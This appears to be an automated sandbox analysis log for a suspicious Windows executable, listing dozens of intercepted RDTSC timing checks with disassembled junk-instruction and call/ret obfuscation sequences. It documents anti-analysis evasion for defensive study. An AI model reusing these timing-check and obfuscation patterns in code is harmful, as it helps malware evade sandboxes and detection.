Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A8C46C second address: A8C48E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jnc 00007F5BD0FFF0C6h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A8C48E second address: A8C4B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5BD0C7BA6Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A8C4B6 second address: A8C4DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5BD0FFF0D7h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A8C4DC second address: A8C4E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A8C73C second address: A8C740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A8C8A3 second address: A8C8C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 add dword ptr [esp], 4099B3A0h 0x0000000d lea ebx, dword ptr [ebp+12BAF39Fh] 0x00000013 xor dword ptr [ebp+12A31AEBh], esi 0x00000019 xchg eax, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pushad 0x0000001e popad 0x0000001f pop eax 0x00000020 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A8CA31 second address: A8CA52 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5BD0FFF0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F5BD0FFF0D4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A6DE90 second address: A6DE96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A6DE96 second address: A6DE9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A6DE9C second address: A6DEA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AAACC8 second address: AAACD4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5BD0FFF0C6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AAACD4 second address: AAACE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5BD0C7BA70h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AAB0A7 second address: AAB0AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AAB1F8 second address: AAB1FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AAB1FC second address: AAB20A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F5BD0FFF0C6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AAB20A second address: AAB20E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AAB20E second address: AAB224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F5BD0FFF0CDh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AAB224 second address: AAB24B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5BD0C7BA71h 0x0000000f jmp 00007F5BD0C7BA6Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AAB24B second address: AAB263 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AAB263 second address: AAB274 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5BD0C7BA6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AAB6B4 second address: AAB6B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AAB953 second address: AAB98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BD0C7BA6Fh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F5BD0C7BA6Ah 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 popad 0x00000019 jnc 00007F5BD0C7BA66h 0x0000001f pop eax 0x00000020 push edi 0x00000021 pushad 0x00000022 popad 0x00000023 pop edi 0x00000024 pushad 0x00000025 jng 00007F5BD0C7BA66h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AABAC5 second address: AABAC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AABAC9 second address: AABAE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BD0C7BA6Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnp 00007F5BD0C7BA66h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AABAE5 second address: AABAEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AA185B second address: AA1864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A7EAFF second address: A7EB0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A7EB0B second address: A7EB24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push edi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 popad 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AAC91C second address: AAC949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5BD0FFF0C6h 0x0000000a popad 0x0000000b pop esi 0x0000000c pushad 0x0000000d jng 00007F5BD0FFF0D8h 0x00000013 jne 00007F5BD0FFF0CEh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AB1C02 second address: AB1C2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 jnp 00007F5BD0C7BA72h 0x00000017 jl 00007F5BD0C7BA6Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AB1E5A second address: AB1E5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AB1E5E second address: AB1E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AB1E6B second address: AB1E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AB1E70 second address: AB1EAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jnp 00007F5BD0C7BA78h 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 pushad 0x00000017 push esi 0x00000018 pop esi 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AB1EAF second address: AB1EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b jl 00007F5BD0FFF0C8h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AB39C9 second address: AB39D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AB39D3 second address: AB39D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AB39D7 second address: AB39F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5BD0C7BA71h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A7D036 second address: A7D03A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A7D03A second address: A7D051 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5BD0C7BA66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jp 00007F5BD0C7BA66h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A7D051 second address: A7D06F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F5BD0FFF0CFh 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A7D06F second address: A7D074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABAA53 second address: ABAA5F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5BD0FFF0CEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A7B5AB second address: A7B5B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABA025 second address: ABA029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABA1B8 second address: ABA1C7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5BD0C7BA66h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABA5AF second address: ABA5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F5BD0FFF0D3h 0x0000000f jmp 00007F5BD0FFF0D8h 0x00000014 jmp 00007F5BD0FFF0D6h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABA5FB second address: ABA600 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABA600 second address: ABA60F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABA60F second address: ABA615 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABA8C6 second address: ABA8CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABA8CC second address: ABA8E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BD0C7BA77h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABC888 second address: ABC8B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F5BD0FFF0CCh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABC8B2 second address: ABC8B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABC90E second address: ABC91B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5BD0FFF0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABC91B second address: ABC940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jo 00007F5BD0C7BA70h 0x00000010 pushad 0x00000011 jl 00007F5BD0C7BA66h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f ja 00007F5BD0C7BA66h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABC940 second address: ABC95B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5BD0FFF0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jns 00007F5BD0FFF0C6h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABCD0F second address: ABCD15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABCD15 second address: ABCD1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABCEBB second address: ABCEC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F5BD0C7BA66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABCEC5 second address: ABCEC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABD404 second address: ABD411 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABD411 second address: ABD415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABD415 second address: ABD41B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABD41B second address: ABD42A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BD0FFF0CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABDFE5 second address: ABDFEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABDFEB second address: ABE02B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sub edi, dword ptr [ebp+12A32B46h] 0x0000000f push 00000000h 0x00000011 jmp 00007F5BD0FFF0D7h 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+12A31AEBh], esi 0x0000001e push eax 0x0000001f pushad 0x00000020 jmp 00007F5BD0FFF0CBh 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ABFAAA second address: ABFB3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jp 00007F5BD0C7BA68h 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F5BD0C7BA68h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 movzx edi, bx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007F5BD0C7BA68h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 xchg eax, ebx 0x00000049 pushad 0x0000004a js 00007F5BD0C7BA7Dh 0x00000050 jmp 00007F5BD0C7BA77h 0x00000055 jl 00007F5BD0C7BA6Ch 0x0000005b jng 00007F5BD0C7BA66h 0x00000061 popad 0x00000062 push eax 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F5BD0C7BA6Eh 0x0000006b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AC04F5 second address: AC0567 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F5BD0FFF0C8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 sub dword ptr [ebp+12A31908h], ebx 0x0000002c mov si, bx 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F5BD0FFF0C8h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 00000014h 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b push 00000000h 0x0000004d jmp 00007F5BD0FFF0CEh 0x00000052 push eax 0x00000053 pushad 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AC02B9 second address: AC02BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AC0567 second address: AC056D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AC02BE second address: AC02D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BD0C7BA75h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AC02D7 second address: AC02FE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5BD0FFF0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e pushad 0x0000000f jmp 00007F5BD0FFF0D6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AC0F9D second address: AC0FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5BD0C7BA66h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AC106A second address: AC106E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A83B48 second address: A83B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AC2333 second address: AC2337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A83B4E second address: A83B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AC3C2C second address: AC3C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BD0FFF0CAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AC4454 second address: AC4458 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AC71AC second address: AC71C0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5BD0FFF0C6h 0x00000008 jmp 00007F5BD0FFF0CAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AC71C0 second address: AC71CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F5BD0C7BA66h 0x0000000a rdtsc
